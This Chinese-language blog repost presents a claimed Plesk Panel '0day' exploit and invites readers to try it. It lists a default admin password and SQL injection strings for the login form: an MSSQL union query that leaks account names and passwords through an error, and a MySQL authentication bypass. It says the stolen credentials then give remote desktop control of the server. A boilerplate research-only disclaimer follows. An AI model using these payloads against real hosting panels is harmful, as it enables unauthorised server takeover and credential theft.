Plesk Panel 虚拟主机管理平台 0day - Exp

admin 2021年4月3日18:52:26评论487 views字数 555阅读1分51秒阅读模式

    其实这个漏洞,一年前一个朋友就告诉我了,一直也没怎么玩这个。

    我也没怎么太多去试,具体利用好象有点点麻烦,看到别人都已经放出来了,我也丢出来吧,大家去试吧。

        1、在 http://xxxxxx.com:8880 这里,默认的管理员账户密码admin,密码:stepu。

        2、在 https://xxxxx.com:8443

    Mssql 版本

        账号: ' union select top 1 login+char(124)+passwd from admin_aliases--

        报错,爆出账号密码。

        登陆后 server-->remote desktop 账号密码一样,拿到服务器权限。

    Mysql 版本:

        'union select '-1 union select 1,1,1#'#   密码填:1

文章来源于lcx.cc:Plesk Panel 虚拟主机管理平台 0day - Exp

相关推荐: 我是如何让菜刀无视安全狗的!

我是如何让菜刀无视安全狗的! Sunshie (博客求大牛友链http://phpinfo.me) | 2014-02-01 13:24 需要准备的东西: ************************************** 原版菜刀一个 PHP+Ap…

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日18:52:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Plesk Panel 虚拟主机管理平台 0day - Exphttps://cn-sec.com/archives/318981.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息